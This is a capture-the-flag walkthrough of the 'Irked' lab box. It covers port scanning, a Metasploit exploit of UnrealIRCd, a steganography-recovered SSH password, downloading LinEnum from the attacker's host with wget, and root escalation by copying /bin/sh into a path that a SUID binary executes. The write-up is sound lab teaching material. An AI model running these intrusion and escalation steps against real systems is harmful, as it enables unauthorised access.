Are you ready to hack Irked? For this box, I recommend that you finish blue, legacy, and lame beforehand to build up some base knowledge. This box is a little bit more advanced than the previous ones, and will require a few different techniques.
Starting this box off, I ran an sv scan to get some initial enumeration going. From this we can see there isn’t much interesting except for port 80. So going to that we are left with limited, but useful information.
Here we see a basic jpg image and a small but of text. “IRC is almost working!”, But We didn’t see IRC pull up in the initial scan. Lets run a full port scan against the host in case nmap missed a few. This scan takes a while to run but proves useful.
After the full port scan completes using the flag -p -, we can see it found 4 more ports than our initial scan was able to find. I have not seen UnrealIRCd before, so I went ahead and through it into metasploit just for the hell of it.
As we can see there is an exploit for this service. So lets go ahead and test it out.
So what I did was set the rhosts and ran it just like that which came back with nothing. But this exploit is only targeting one of the three ports running this service, so I changed the port to the next one in the list and ran it again, which proved successful.
First thing I do is go over to our friendly site NetSec to upgrade my shell.
Once I’ve ran the python command, I then run /bin/bash a more full shell.
after some digging around I Found this hidden file within djmardov/documents directory and found this super elite steg backup password.
From here, I saved the image from the website and ran the tool steghide against it.
It saved the password withing this file pass.txt! using this password I try and ssh into the user djmardov
Awesome! That was super simple, but now here is the real trick. Enumeration! For this I am using one of my favorite linux enumeration scripts so I don’t have to manually do all this dirty work. LinEnum, is an amazing tool for linux enumeration and is crucial for future boxes. So lets get it onto this system.
In order to get LinEnum onto this system to run it, I first navigate to the directory thats holding LinEnum.sh and run python -m SimpleHTTPServer to start a simple website to host the file. Back into djmardov’s shell I than use wget 10.10.14.58(yourIP):8000/LinEnum.sh to download the file onto this box.
Using chmod, I make the file executable and run it using ./LinEnum.sh
This gives you a ton of output and knowing what to look at can be hard for the first time, But what I want you to pay attention to is the SUID section near the bottom.
So this file that I have highlighted is not normally on a system, and we have execute perms on it. Let’s see what it does.
So from this we see the last thing it is trying to do is get information from a file that does not exist. We can use this to our advantage!
using the command cp /bin/sh /tmp/listusers puts the command /bin/sh inside the file /listusers, which we can now rerun our /usr/bin/viewuser and see it get executed. Because this file is owned by root we now effectively have a root shell! time to get our keys!
Its that simple, Now remember where the .backup folder was, in that same location /home/djmardov/Documents is our user.txt flag. And now you have successfully hacked into the box Irked!